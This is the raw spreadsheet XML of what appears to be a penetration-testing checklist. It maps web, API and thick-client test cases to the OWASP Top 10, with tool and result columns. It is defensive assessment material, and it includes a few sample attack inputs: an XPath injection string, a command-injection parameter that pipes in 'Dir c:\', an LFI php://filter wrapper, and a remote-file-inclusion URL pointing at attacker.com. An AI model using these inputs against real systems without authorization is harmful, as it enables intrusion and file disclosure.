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olutions-my.sharepoint.com/personal/vishnu_t_tredence_com/Documents/PT/Templates/"/>
    </mc:Choice>
  </mc:AlternateContent>
  <xr:revisionPtr revIDLastSave="13" documentId="8_{8D6DE388-FB04-4E81-A09B-AB334107980D}" xr6:coauthVersionLast="47" xr6:coauthVersionMax="47" xr10:uidLastSave="{C9C613C1-9191-4024-A7F8-17F638C4378A}"/>
  <bookViews>
    <workbookView xWindow="-110" yWindow="-110" windowWidth="19420" windowHeight="10300" xr2:uid="{270E4B15-D8B6-483F-BDC0-D904B287BF8D}"/>
  </bookViews>
  <sheets>
    <sheet name="Web App Checklist" sheetId="1" r:id="rId1"/>
    <sheet name="API Checklist" sheetId="4" r:id="rId2"/>
    <sheet name="Thick Client" sheetId="5" r:id="rId3"/>
  </sheets>
  <definedNames>
    <definedName name="_xlnm._FilterDatabase" localSheetId="1" hidden="1">'API Checklist'!$A$1:$G$1</definedName>
    <definedName name="_xlnm._FilterDatabase" localSheetId="0" hidden="1">'Web App Checklist'!$A$1:$G$123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<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="624" uniqueCount="242">
  <si>
    <t>No.</t>
  </si>
  <si>
    <t>Vulnerability Name</t>
  </si>
  <si>
    <t>Test Case Name</t>
  </si>
  <si>
    <t>Tools/Manual Assessment</t>
  </si>
  <si>
    <t>OWASP Top-10 Web Security Risks,2021</t>
  </si>
  <si>
    <t>Tested</t>
  </si>
  <si>
    <t>Result</t>
  </si>
  <si>
    <t>Vertical Privilege Escalation</t>
  </si>
  <si>
    <t>Test vertical privilege escalation from user to admin</t>
  </si>
  <si>
    <t>Manual</t>
  </si>
  <si>
    <t>A1: Broken Access Control</t>
  </si>
  <si>
    <t>Yes</t>
  </si>
  <si>
    <t>Horizontal Privilege Escalation</t>
  </si>
  <si>
    <t>Test horizontal privilege escalation from user to user</t>
  </si>
  <si>
    <t>Negative</t>
  </si>
  <si>
    <t>IDOR</t>
  </si>
  <si>
    <t>Test by changing the ID parameter</t>
  </si>
  <si>
    <t>NA</t>
  </si>
  <si>
    <t>Test by adding parameters at the endpoints</t>
  </si>
  <si>
    <t>Test by changing methods</t>
  </si>
  <si>
    <t>Test by wrapping the ID with an array</t>
  </si>
  <si>
    <t>Test for JSON parameter pollution</t>
  </si>
  <si>
    <t>OTP Bypass</t>
  </si>
  <si>
    <t>Test by response manipulation</t>
  </si>
  <si>
    <t>Test OTP bypass by entering the old OTP</t>
  </si>
  <si>
    <t>Test OTP bypass by bruteforcing</t>
  </si>
  <si>
    <t>Test by status Code manipulation</t>
  </si>
  <si>
    <t>Test by using null or empty entry</t>
  </si>
  <si>
    <t xml:space="preserve">Weak TLS </t>
  </si>
  <si>
    <t>Test to ensure TLS 1.0 and TLS 1.1 are not in use</t>
  </si>
  <si>
    <t>testssl.sh/ssllabs</t>
  </si>
  <si>
    <t>A2: Cryptograhic Failures</t>
  </si>
  <si>
    <t>Test the digital certificate's cryptographic strength and validity</t>
  </si>
  <si>
    <t>Validate the server configuration (Identify weak ciphers/protocols (ie. RC4, BEAST, CRIME, POODLE)</t>
  </si>
  <si>
    <t>Sensitive Information In the URL</t>
  </si>
  <si>
    <t>Test to ensure sensitive data is not transmitting is GET url</t>
  </si>
  <si>
    <t>Manual/Burpsuite</t>
  </si>
  <si>
    <t>Sensitive Data includes passwords, OTP, etc.</t>
  </si>
  <si>
    <t>Stored XSS</t>
  </si>
  <si>
    <t>Test and identify input parameters that will reflect on the client side</t>
  </si>
  <si>
    <t>A3: Injection</t>
  </si>
  <si>
    <t>Assess the input they accept and the encoding that gets applied on return (if any).</t>
  </si>
  <si>
    <t>Reflected XSS</t>
  </si>
  <si>
    <t>Identify variables that are reflected in responses.</t>
  </si>
  <si>
    <t>DOM Based XSS</t>
  </si>
  <si>
    <t>Try to identify DOM sinks</t>
  </si>
  <si>
    <t>Build payloads to that DOM sink type</t>
  </si>
  <si>
    <t>HTML Injection</t>
  </si>
  <si>
    <t>Test by injecting HTML payloads in input parameters</t>
  </si>
  <si>
    <t>SQL Injection</t>
  </si>
  <si>
    <t xml:space="preserve">Test by injecting SQL queries in input parameters </t>
  </si>
  <si>
    <t>Burpsuite/SQLmap</t>
  </si>
  <si>
    <t>SQL Injection ( Boolean &amp; UNION based )</t>
  </si>
  <si>
    <t>Error based SQL injection</t>
  </si>
  <si>
    <t>Inferential/Blind SQL Injection</t>
  </si>
  <si>
    <t>Time based SQL injection</t>
  </si>
  <si>
    <t>Second Order SQL Injection</t>
  </si>
  <si>
    <t>XPath Injection</t>
  </si>
  <si>
    <t>Identify XPATH injection points by checking for XML error enumeration by supplying a single quote ('): 
Username: ‘ or ‘1’ = ‘1,                                                   
Password: ‘ or ‘1’ = ‘1</t>
  </si>
  <si>
    <t>Server Side Template Injection (SSTI)</t>
  </si>
  <si>
    <t>Detect template injection vulnerability points.</t>
  </si>
  <si>
    <t>Identify the templating engine.</t>
  </si>
  <si>
    <t>Build the exploit.</t>
  </si>
  <si>
    <t>Command Injection</t>
  </si>
  <si>
    <t>Identify and assess the command injection points with special characters (i.e.: | ; &amp; $ &gt; &lt; ' !)
For example: ?doc=Doc1.pdf+|+Dir c:\</t>
  </si>
  <si>
    <t>Code Injection</t>
  </si>
  <si>
    <t>Identify injection points where you can inject code into the application</t>
  </si>
  <si>
    <t>Check LFI with dot-dot-slash (../../), PHP Wrapper (php://filter/convert.base64-encode/resource).</t>
  </si>
  <si>
    <t>Check RFI from malicious URL: 
?page.php?file=http://attacker.com/malicious_page</t>
  </si>
  <si>
    <t>XML Injection</t>
  </si>
  <si>
    <t xml:space="preserve">Test if the application is processing XML input </t>
  </si>
  <si>
    <t>Burpsuite/Wfuzz</t>
  </si>
  <si>
    <t>Test XML to retrieve files</t>
  </si>
  <si>
    <t>HTTP Parameter Pollution</t>
  </si>
  <si>
    <t>Identify the backend and the parsing method used.</t>
  </si>
  <si>
    <t>Assess injection points and try bypassing input filters using HTTP</t>
  </si>
  <si>
    <t>Host Header Injection</t>
  </si>
  <si>
    <t>Test host header injection by changing the Host of HTTP request</t>
  </si>
  <si>
    <t>Burpsuite/Netcat</t>
  </si>
  <si>
    <t>Test by adding 'X-Forwarded-Host' header in the HTTP request</t>
  </si>
  <si>
    <t>Test by password reset poisoning attack.</t>
  </si>
  <si>
    <t>Test by adding double host header in the HTTP request</t>
  </si>
  <si>
    <t>URL Redirection</t>
  </si>
  <si>
    <t>Identify injection points that handle URLs or paths.</t>
  </si>
  <si>
    <t>Assess the locations that the system could redirect.</t>
  </si>
  <si>
    <t xml:space="preserve">For example: ?redirect=www.fake-target.site </t>
  </si>
  <si>
    <t>Unencrypted Communications</t>
  </si>
  <si>
    <t>Test to ensure application is running on HTTPS protocol</t>
  </si>
  <si>
    <t>A4: Insecure Design</t>
  </si>
  <si>
    <t>Improper Error Handling</t>
  </si>
  <si>
    <t>Test error handling by modifying the URL parameter</t>
  </si>
  <si>
    <t>Test the different outputs returned such as Database error</t>
  </si>
  <si>
    <t>Test error handling by uploading unrecognized file formats</t>
  </si>
  <si>
    <t>Test error handling by entering unrecognized inputs</t>
  </si>
  <si>
    <t>Internal Path Disclosure</t>
  </si>
  <si>
    <t>Test by sending some inadequate value in the input parameter</t>
  </si>
  <si>
    <t>Test to ensure that it does not disclose information such as design of the software, revelaing database versions, etc.</t>
  </si>
  <si>
    <t>Business Logic Flaw</t>
  </si>
  <si>
    <t>Identify the logic of how the application works</t>
  </si>
  <si>
    <t>Test for parameter tampering</t>
  </si>
  <si>
    <t>Identify the functionality of all the buttons</t>
  </si>
  <si>
    <t>Malicious File Upload</t>
  </si>
  <si>
    <t>Test file upload by adding double extension</t>
  </si>
  <si>
    <t>A5: Security Misconfiguration</t>
  </si>
  <si>
    <t>Test uploading large file size</t>
  </si>
  <si>
    <t>Test with long file names</t>
  </si>
  <si>
    <t>Test using payload as file name</t>
  </si>
  <si>
    <t xml:space="preserve">Test for Exif geolocation data </t>
  </si>
  <si>
    <t>Test by uploading multiple files (DOS)</t>
  </si>
  <si>
    <t>User Enumeration</t>
  </si>
  <si>
    <t>Test for valid credentials response</t>
  </si>
  <si>
    <t>Test for valid user and  wrong password</t>
  </si>
  <si>
    <t>Test for a non-existent username</t>
  </si>
  <si>
    <t>Test on password reset page</t>
  </si>
  <si>
    <t>Clear Text Transmission Of Sensitive Data</t>
  </si>
  <si>
    <t>Test if HTTP request or response is transmitting sensitive data in clear text</t>
  </si>
  <si>
    <t>Cross Origin Resource Sharing (CORS)</t>
  </si>
  <si>
    <t xml:space="preserve">Test for Access-Control-Allow-Origin as insecure wildcard </t>
  </si>
  <si>
    <t>Burpsuite/Corsy</t>
  </si>
  <si>
    <t>Test if Access-Control-Allow-Credentials is set to true</t>
  </si>
  <si>
    <t>Clickjacking</t>
  </si>
  <si>
    <t>Test if the URL can be embedded into an HTML page</t>
  </si>
  <si>
    <t>Clickjacker.io</t>
  </si>
  <si>
    <t xml:space="preserve">Test to ensure 'X-Frame Options' header is enabled. </t>
  </si>
  <si>
    <t>OPTIONS Method Enabled</t>
  </si>
  <si>
    <t>Test to ensure OPTIONS method are disabled</t>
  </si>
  <si>
    <t>Missing Security Headers</t>
  </si>
  <si>
    <t>Test to ensure all the HTTP response headers are enabled</t>
  </si>
  <si>
    <t>Burpsuite/  securityheaders.com</t>
  </si>
  <si>
    <t>Missing Cookie Attributes</t>
  </si>
  <si>
    <t>Test if HTTP Only flag is set</t>
  </si>
  <si>
    <t>Burpsuite/              Inspect Element</t>
  </si>
  <si>
    <t>Test if Secure Flag is set</t>
  </si>
  <si>
    <t>Test if Same-Site cookie attribute is set to Lax</t>
  </si>
  <si>
    <t>Missing HSTS Header</t>
  </si>
  <si>
    <t>Test to ensure HSTS header is enabled</t>
  </si>
  <si>
    <t>Missing Rate Limit</t>
  </si>
  <si>
    <t>Test to ensure rate limit is enabled</t>
  </si>
  <si>
    <t>Burpsuite</t>
  </si>
  <si>
    <t>Try to bypass rate limiting by adding / at the end of the URL</t>
  </si>
  <si>
    <t>Try to bypass rate limiting by adding HTTP headers, X-Forwarded-For etc.</t>
  </si>
  <si>
    <t>Try to bypass rate limiting by adding HTTP headers twice</t>
  </si>
  <si>
    <t>Try to bypass rate limiting by using null bytes at the end</t>
  </si>
  <si>
    <t>Try to bypass rate limiting by using race conditions</t>
  </si>
  <si>
    <t xml:space="preserve">Improper Cache Control </t>
  </si>
  <si>
    <t>Test if the application stores sensitive information on the client-side</t>
  </si>
  <si>
    <t>Test if access can occur without authorization</t>
  </si>
  <si>
    <t>Ensure no sensitive data is stored in the browser cache storage</t>
  </si>
  <si>
    <t>CSRF</t>
  </si>
  <si>
    <t>Check if the token is validated on the server side or not</t>
  </si>
  <si>
    <t>Check by reusing the token</t>
  </si>
  <si>
    <t>Check CSRF by removing the token value</t>
  </si>
  <si>
    <t>Check by generating an random token</t>
  </si>
  <si>
    <t>Check by changing or deleting some characters of the CSRF token</t>
  </si>
  <si>
    <t>Check if the token is encoded</t>
  </si>
  <si>
    <t>Check by interchanging POST with GET method</t>
  </si>
  <si>
    <t>Check by changing the content type to form-multipart</t>
  </si>
  <si>
    <t>Check 'Referrer' header</t>
  </si>
  <si>
    <t>Check 'Same-Site' cookie attribute</t>
  </si>
  <si>
    <t>Directory Listing/Directory Indexing</t>
  </si>
  <si>
    <t>Identify injection points that pertain to path traversal.</t>
  </si>
  <si>
    <t>Burpsuite/dirsearch/gobuster</t>
  </si>
  <si>
    <t>Assess bypassing techniques and identify the extent of path traversal (dot-dot-slash attack, Local/Remote file inclusion)</t>
  </si>
  <si>
    <t>Components With Known Vulnerabilities</t>
  </si>
  <si>
    <t>Test to ensure applications are not using old server versions</t>
  </si>
  <si>
    <t>Burpsuite/Wapplyzer</t>
  </si>
  <si>
    <t xml:space="preserve">A6: Vulnerable and Outdated Components </t>
  </si>
  <si>
    <t>Test to ensure server name are not disclosed in the application</t>
  </si>
  <si>
    <t>Inadequate Session Management</t>
  </si>
  <si>
    <t>Is the session token changed on login/logout?</t>
  </si>
  <si>
    <t>A7: Identification and Authentication Failures</t>
  </si>
  <si>
    <t>Is the session token random?</t>
  </si>
  <si>
    <t>Is the session token stored as a persistent cookie?</t>
  </si>
  <si>
    <t>Is the session cookie attribute set to "Secure", "HTTPOnly" and path, samesite</t>
  </si>
  <si>
    <t>Is the session token visible in History?</t>
  </si>
  <si>
    <t>Is the session invalidated after logout?</t>
  </si>
  <si>
    <t>Is the session token or any other sensitive information going to external sites in referrer?</t>
  </si>
  <si>
    <t>Does the session timeout after a period of inactivity?</t>
  </si>
  <si>
    <t>Is the session terminated at the server when the browser is closed without clicking log off?</t>
  </si>
  <si>
    <t xml:space="preserve">Session Fixation </t>
  </si>
  <si>
    <t>Ensure new cookies have been issued upon a successful authentication</t>
  </si>
  <si>
    <t xml:space="preserve">Session Hijacking </t>
  </si>
  <si>
    <t>Test session hijacking on target that doesn’t has HSTS enabled</t>
  </si>
  <si>
    <t>Test by login with the help of captured cookies</t>
  </si>
  <si>
    <t>Weak Password Policy</t>
  </si>
  <si>
    <t xml:space="preserve">Test if the strong/complex password policy has been enforced at both client and server-side application </t>
  </si>
  <si>
    <t>Test to ensure new password is not same as old password</t>
  </si>
  <si>
    <t>Test the password length</t>
  </si>
  <si>
    <t>Check the user is prevented to use his username as a password</t>
  </si>
  <si>
    <t>SSRF</t>
  </si>
  <si>
    <t>Test if the application is  interacting with external resource</t>
  </si>
  <si>
    <t>A10: Server-Side Request Forgery (SSRF)</t>
  </si>
  <si>
    <t>Test SSRF to find AWS metadata</t>
  </si>
  <si>
    <t>Test SSRF that lead to internal files</t>
  </si>
  <si>
    <t>OWASP Top-10 API Application Security Risks,2022</t>
  </si>
  <si>
    <t>Broken Object Level Authorization (BOLA)</t>
  </si>
  <si>
    <t>Manual/Burpsuite/Postman</t>
  </si>
  <si>
    <t>API 1: Broken Object Level Authorization</t>
  </si>
  <si>
    <t>Don't auto-increment IDs. Use UUID instead.</t>
  </si>
  <si>
    <t xml:space="preserve">Broken Authentication </t>
  </si>
  <si>
    <t xml:space="preserve">Test if the strong/complex password policy has been enforced at server-side application </t>
  </si>
  <si>
    <t>Manual/Burpsuite/jwt.io</t>
  </si>
  <si>
    <t>API 2: Broken Authentication</t>
  </si>
  <si>
    <t>Test if authentication tokens are disclosed in GET and URLs requests</t>
  </si>
  <si>
    <t>Ensure to use API keys for authentication</t>
  </si>
  <si>
    <t>Ensure 'Basic Auth' authentication is not used, instead use standard authentication such as JWT</t>
  </si>
  <si>
    <t xml:space="preserve">Test for insecure JWT configurations such as weak digital signatures algorithm, missing signatures </t>
  </si>
  <si>
    <t>Ensure all sensitive data is encrypted</t>
  </si>
  <si>
    <t xml:space="preserve">Test token expiration and ensure expiration (TTL,RTTL) is short as possible. </t>
  </si>
  <si>
    <t>Ensure sensitive data is not stored in JWT token</t>
  </si>
  <si>
    <t>API Mass Assignment</t>
  </si>
  <si>
    <t>Try to overwrite server side variables in HTTP request</t>
  </si>
  <si>
    <t>API 3: Broken Object Property Level Authorization</t>
  </si>
  <si>
    <t>Try adding variables in HTTP request</t>
  </si>
  <si>
    <t>Sensitive Data Exposure</t>
  </si>
  <si>
    <t>Test to ensure sensitive information such as passwords, API keys, PII, login credentials, etc. are not disclosed in response.</t>
  </si>
  <si>
    <t>API 4: Unrestricted Resource Consumption</t>
  </si>
  <si>
    <t>Limit requests (Throttling) to avoid DDoS / brute-force attacks</t>
  </si>
  <si>
    <t>testssl.sh</t>
  </si>
  <si>
    <t>Broken Function Level Authorization</t>
  </si>
  <si>
    <t>Always validate redirect_uri server-side to allow only safelisted URLs.</t>
  </si>
  <si>
    <t>API 5: Broken Function Level Authorization</t>
  </si>
  <si>
    <t>Always try to exchange for code and not tokens (don't allow response_type=token).</t>
  </si>
  <si>
    <t>Use state parameter with a random hash to prevent CSRF on the OAuth authorization process.</t>
  </si>
  <si>
    <t>Identify the logic of how the API works</t>
  </si>
  <si>
    <t>API 6: Unrestricted Access Of Sensitive Business Flows</t>
  </si>
  <si>
    <t>API 7: Server Side Request Forgery</t>
  </si>
  <si>
    <t>API 8: Security Misconfiguration</t>
  </si>
  <si>
    <t>Directory listing should be turned off</t>
  </si>
  <si>
    <t>Test if Access-Control-Allow-Credentials is set to false</t>
  </si>
  <si>
    <t>Missing Input Validation</t>
  </si>
  <si>
    <t>Ensure server-side validation is implemented on all the paramters</t>
  </si>
  <si>
    <t>Improper Inventory Management</t>
  </si>
  <si>
    <t>Test proper inventory of hosts and deployed API versions such deprecated API versions and exposed debug endpoints</t>
  </si>
  <si>
    <t>API 9: Improper Inventory Management</t>
  </si>
  <si>
    <t>Unsafe Consumption of APIs</t>
  </si>
  <si>
    <t>Ensure and evaluate the third party service providers API security posture</t>
  </si>
  <si>
    <t>API 10: Unsafe Consumption of APIs</t>
  </si>
  <si>
    <t>Ensure all API interactions happens over a secure communication channel (TLS)</t>
  </si>
  <si>
    <t>Always validate and properly sanitize data received from integrated APIs before using it.</t>
  </si>
  <si>
    <t>Ensure API redirection to an well known location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</si>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</sst>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" quotePrefix="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="5" xfId="1" quotePrefix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1" xfId="1" quotePrefix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2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3">
    <cellStyle name="Normal" xfId="0" builtinId="0"/>
    <cellStyle name="Normal 2" xfId="1" xr:uid="{8BF35D8A-1B05-4642-8C09-3A0FA650E831}"/>
    <cellStyle name="Normal 3" xfId="2" xr:uid="{C3381CBD-40F9-4397-BED7-D4BB34179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0F9F-BCEE-4EC7-B275-3097C516F2DB}">
  <sheetPr codeName="Sheet1"/>
  <dimension ref="A1:G162"/>
  <sheetViews>
    <sheetView tabSelected="1" topLeftCell="A2" workbookViewId="0">
      <selection activeCell="C131" sqref="C131"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultRowHeight="14.5" x14ac:dyDescent="0.35"/>
  <cols>
    <col min="1" max="1" width="4.26953125" customWidth="1"/>
    <col min="2" max="2" width="30.81640625" customWidth="1"/>
    <col min="3" max="3" width="53.7265625" customWidth="1"/>
    <col min="4" max="4" width="18.54296875" customWidth="1"/>
    <col min="5" max="5" width="38.453125" customWidth="1"/>
    <col min="6" max="6" width="9.26953125" customWidth="1"/>
    <col min="7" max="7" width="9.54296875" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:7" ht="29" x14ac:dyDescent="0.35">
      <c r="A1" s="7" t="s">
        <v>0</v>
      </c>
      <c r="B1" s="7" t="s">
        <v>1</v>
      </c>
      <c r="C1" s="7" t="s">
        <v>2</v>
      </c>
      <c r="D1" s="14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3">
        <v>1</v>
      </c>
      <c r="B2" s="15" t="s">
        <v>7</v>
      </c>
      <c r="C2" s="10" t="s">
        <v>8</v>
      </c>
      <c r="D2" s="15" t="s">
        <v>9</v>
      </c>
      <c r="E2" s="15" t="s">
        <v>10</v>
      </c>
      <c r="F2" s="1" t="s">
        <v>17</v>
      </c>
      <c r="G2" s="1" t="s">
        <v>14</v>
      </c>
    </row>
    <row r="3" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A3" s="3">
        <v>2</v>
      </c>
      <c r="B3" s="15" t="s">
        <v>12</v>
      </c>
      <c r="C3" s="10" t="s">
        <v>13</v>
      </c>
      <c r="D3" s="15" t="s">
        <v>9</v>
      </c>
      <c r="E3" s="15" t="s">
        <v>10</v>
      </c>
      <c r="F3" s="1" t="s">
        <v>17</v>
      </c>
      <c r="G3" s="1" t="s">
        <v>14</v>
      </c>
    </row>
    <row r="4" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A4" s="40">
        <v>3</v>
      </c>
      <c r="B4" s="43" t="s">
        <v>15</v>
      </c>
      <c r="C4" s="17" t="s">
        <v>16</v>
      </c>
      <c r="D4" s="15" t="s">
        <v>9</v>
      </c>
      <c r="E4" s="16" t="s">
        <v>10</v>
      </c>
      <c r="F4" s="1"/>
      <c r="G4" s="1"/>
    </row>
    <row r="5" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A5" s="41"/>
      <c r="B5" s="45"/>
      <c r="C5" s="17" t="s">
        <v>18</v>
      </c>
      <c r="D5" s="15" t="s">
        <v>9</v>
      </c>
      <c r="E5" s="16" t="s">
        <v>10</v>
      </c>
      <c r="F5" s="3"/>
      <c r="G5" s="2"/>
    </row>
    <row r="6" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6" s="41"/>
      <c r="B6" s="45"/>
      <c r="C6" s="17" t="s">
        <v>19</v>
      </c>
      <c r="D6" s="15" t="s">
        <v>9</v>
      </c>
      <c r="E6" s="16" t="s">
        <v>10</v>
      </c>
      <c r="F6" s="3"/>
      <c r="G6" s="2"/>
    </row>
    <row r="7" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A7" s="41"/>
      <c r="B7" s="45"/>
      <c r="C7" s="17" t="s">
        <v>20</v>
      </c>
      <c r="D7" s="15" t="s">
        <v>9</v>
      </c>
      <c r="E7" s="16" t="s">
        <v>10</v>
      </c>
      <c r="F7" s="3"/>
      <c r="G7" s="2"/>
    </row>
    <row r="8" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A8" s="42"/>
      <c r="B8" s="44"/>
      <c r="C8" s="17" t="s">
        <v>21</v>
      </c>
      <c r="D8" s="15" t="s">
        <v>9</v>
      </c>
      <c r="E8" s="16" t="s">
        <v>10</v>
      </c>
      <c r="F8" s="3"/>
      <c r="G8" s="2"/>
    </row>
    <row r="9" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9" s="40">
        <v>4</v>
      </c>
      <c r="B9" s="43" t="s">
        <v>22</v>
      </c>
      <c r="C9" s="18" t="s">
        <v>23</v>
      </c>
      <c r="D9" s="15" t="s">
        <v>9</v>
      </c>
      <c r="E9" s="16" t="s">
        <v>10</v>
      </c>
      <c r="F9" s="1" t="s">
        <v>17</v>
      </c>
      <c r="G9" s="1" t="s">
        <v>14</v>
      </c>
    </row>
    <row r="10" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10" s="41"/>
      <c r="B10" s="45"/>
      <c r="C10" s="17" t="s">
        <v>24</v>
      </c>
      <c r="D10" s="15" t="s">
        <v>9</v>
      </c>
      <c r="E10" s="16" t="s">
        <v>10</v>
      </c>
      <c r="F10" s="1" t="s">
        <v>17</v>
      </c>
      <c r="G10" s="1" t="s">
        <v>14</v>
      </c>
    </row>
    <row r="11" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11" s="41"/>
      <c r="B11" s="45"/>
      <c r="C11" s="17" t="s">
        <v>25</v>
      </c>
      <c r="D11" s="15" t="s">
        <v>9</v>
      </c>
      <c r="E11" s="16" t="s">
        <v>10</v>
      </c>
      <c r="F11" s="1" t="s">
        <v>17</v>
      </c>
      <c r="G11" s="1" t="s">
        <v>14</v>
      </c>
    </row>
    <row r="12" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12" s="41"/>
      <c r="B12" s="45"/>
      <c r="C12" s="10" t="s">
        <v>26</v>
      </c>
      <c r="D12" s="15" t="s">
        <v>9</v>
      </c>
      <c r="E12" s="16" t="s">
        <v>10</v>
      </c>
      <c r="F12" s="1" t="s">
        <v>17</v>
      </c>
      <c r="G12" s="1" t="s">
        <v>14</v>
      </c>
    </row>
    <row r="13" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13" s="42"/>
      <c r="B13" s="44"/>
      <c r="C13" s="10" t="s">
        <v>27</v>
      </c>
      <c r="D13" s="15" t="s">
        <v>9</v>
      </c>
      <c r="E13" s="16" t="s">
        <v>10</v>
      </c>
      <c r="F13" s="1" t="s">
        <v>17</v>
      </c>
      <c r="G13" s="1" t="s">
        <v>14</v>
      </c>
    </row>
    <row r="14" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A14" s="40">
        <v>5</v>
      </c>
      <c r="B14" s="43" t="s">
        <v>28</v>
      </c>
      <c r="C14" s="10" t="s">
        <v>29</v>
      </c>
      <c r="D14" s="23" t="s">
        <v>30</v>
      </c>
      <c r="E14" s="16" t="s">
        <v>31</v>
      </c>
      <c r="F14" s="1" t="s">
        <v>11</v>
      </c>
      <c r="G14" s="1" t="s">
        <v>241</v>
      </c>
    </row>
    <row r="15" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15" s="41"/>
      <c r="B15" s="45"/>
      <c r="C15" s="10" t="s">
        <v>32</v>
      </c>
      <c r="D15" s="23" t="s">
        <v>30</v>
      </c>
      <c r="E15" s="16" t="s">
        <v>31</v>
      </c>
      <c r="F15" s="1"/>
      <c r="G15" s="1"/>
    </row>
    <row r="16" spans="1:7" ht="29" x14ac:dyDescent="0.35">
      <c r="A16" s="42"/>
      <c r="B16" s="44"/>
      <c r="C16" s="10" t="s">
        <v>33</v>
      </c>
      <c r="D16" s="23" t="s">
        <v>30</v>
      </c>
      <c r="E16" s="16" t="s">
        <v>31</v>
      </c>
      <c r="F16" s="1"/>
      <c r="G16" s="1"/>
    </row>
    <row r="17" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A17" s="40">
        <v>6</v>
      </c>
      <c r="B17" s="43" t="s">
        <v>34</v>
      </c>
      <c r="C17" s="10" t="s">
        <v>35</v>
      </c>
      <c r="D17" s="23" t="s">
        <v>36</v>
      </c>
      <c r="E17" s="16" t="s">
        <v>31</v>
      </c>
      <c r="F17" s="1"/>
      <c r="G17" s="1"/>
    </row>
    <row r="18" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18" s="42"/>
      <c r="B18" s="44"/>
      <c r="C18" s="10" t="s">
        <v>37</v>
      </c>
      <c r="D18" s="23" t="s">
        <v>36</v>
      </c>
      <c r="E18" s="16" t="s">
        <v>31</v>
      </c>
      <c r="F18" s="1"/>
      <c r="G18" s="1"/>
    </row>
    <row r="19" spans="1:7" ht="29" x14ac:dyDescent="0.35">
      <c r="A19" s="40">
        <v>7</v>
      </c>
      <c r="B19" s="43" t="s">
        <v>38</v>
      </c>
      <c r="C19" s="10" t="s">
        <v>39</v>
      </c>
      <c r="D19" s="23" t="s">
        <v>36</v>
      </c>
      <c r="E19" s="16" t="s">
        <v>40</v>
      </c>
      <c r="F19" s="1"/>
      <c r="G19" s="1"/>
    </row>
    <row r="20" spans="1:7" ht="29" x14ac:dyDescent="0.35">
      <c r="A20" s="42"/>
      <c r="B20" s="44"/>
      <c r="C20" s="8" t="s">
        <v>41</v>
      </c>
      <c r="D20" s="23" t="s">
        <v>36</v>
      </c>
      <c r="E20" s="16" t="s">
        <v>40</v>
      </c>
      <c r="F20" s="1"/>
      <c r="G20" s="1"/>
    </row>
    <row r="21" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A21" s="40">
        <v>8</v>
      </c>
      <c r="B21" s="43" t="s">
        <v>42</v>
      </c>
      <c r="C21" s="8" t="s">
        <v>43</v>
      </c>
      <c r="D21" s="23" t="s">
        <v>36</v>
      </c>
      <c r="E21" s="16" t="s">
        <v>40</v>
      </c>
      <c r="F21" s="1"/>
      <c r="G21" s="1"/>
    </row>
    <row r="22" spans="1:7" ht="29" x14ac:dyDescent="0.35">
      <c r="A22" s="42"/>
      <c r="B22" s="44"/>
      <c r="C22" s="8" t="s">
        <v>41</v>
      </c>
      <c r="D22" s="23" t="s">
        <v>36</v>
      </c>
      <c r="E22" s="16" t="s">
        <v>40</v>
      </c>
      <c r="F22" s="1"/>
      <c r="G22" s="1"/>
    </row>
    <row r="23" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A23" s="40">
        <v>9</v>
      </c>
      <c r="B23" s="43" t="s">
        <v>44</v>
      </c>
      <c r="C23" s="18" t="s">
        <v>45</v>
      </c>
      <c r="D23" s="23" t="s">
        <v>36</v>
      </c>
      <c r="E23" s="16" t="s">
        <v>40</v>
      </c>
      <c r="F23" s="1"/>
      <c r="G23" s="1"/>
    </row>
    <row r="24" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A24" s="42"/>
      <c r="B24" s="44"/>
      <c r="C24" s="17" t="s">
        <v>46</v>
      </c>
      <c r="D24" s="23" t="s">
        <v>36</v>
      </c>
      <c r="E24" s="16" t="s">
        <v>40</v>
      </c>
      <c r="F24" s="1"/>
      <c r="G24" s="1"/>
    </row>
    <row r="25" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A25" s="3">
        <v>10</v>
      </c>
      <c r="B25" s="15" t="s">
        <v>47</v>
      </c>
      <c r="C25" s="10" t="s">
        <v>48</v>
      </c>
      <c r="D25" s="23" t="s">
        <v>36</v>
      </c>
      <c r="E25" s="16" t="s">
        <v>40</v>
      </c>
      <c r="F25" s="1"/>
      <c r="G25" s="1"/>
    </row>
    <row r="26" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A26" s="40">
        <v>11</v>
      </c>
      <c r="B26" s="43" t="s">
        <v>49</v>
      </c>
      <c r="C26" s="22" t="s">
        <v>50</v>
      </c>
      <c r="D26" s="11" t="s">
        <v>51</v>
      </c>
      <c r="E26" s="16" t="s">
        <v>40</v>
      </c>
      <c r="F26" s="1"/>
      <c r="G26" s="1"/>
    </row>
    <row r="27" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A27" s="41"/>
      <c r="B27" s="45"/>
      <c r="C27" s="11" t="s">
        <v>52</v>
      </c>
      <c r="D27" s="11" t="s">
        <v>51</v>
      </c>
      <c r="E27" s="16" t="s">
        <v>40</v>
      </c>
      <c r="F27" s="1"/>
      <c r="G27" s="1"/>
    </row>
    <row r="28" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A28" s="41"/>
      <c r="B28" s="45"/>
      <c r="C28" s="11" t="s">
        <v>53</v>
      </c>
      <c r="D28" s="11" t="s">
        <v>51</v>
      </c>
